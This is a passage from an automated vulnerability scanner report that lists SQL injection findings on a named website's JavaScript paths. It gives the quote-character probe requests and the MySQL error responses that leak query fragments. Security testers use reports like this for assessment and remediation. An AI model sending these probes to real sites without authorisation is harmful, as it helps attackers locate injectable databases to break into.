Content-Length: 1786

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or fileinfo_url = '/js'/common.js/') or (fileinfo_url like '/js'/common.js/ind' at line 5</font>
...[SNIP]...

1.36. http://x17online.com/js/common.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /js/common.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /js/common.js'?4068 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:13:15 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1786

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/js/common.js'/index%'))
and blo' at line 5</font>
...[SNIP]...

1.37. http://x17online.com/js/main.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /js/main.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /js'/main.js?9728 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:14:21 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1784

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' or fileinfo_url = '/js'/main.js/') or (fileinfo_url like '/js'/main.js/index%'' at line 5</font>
...[SNIP]...

1.38. http://x17online.com/js/main.js [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://x17online.com
Path:   /js/main.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /js/main.js'?9728 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: x17online.com

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 20:14:22 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1784

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/js/main.js'/index%'))
and blog_' at line 5</font>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 17:03:59 CST 2011.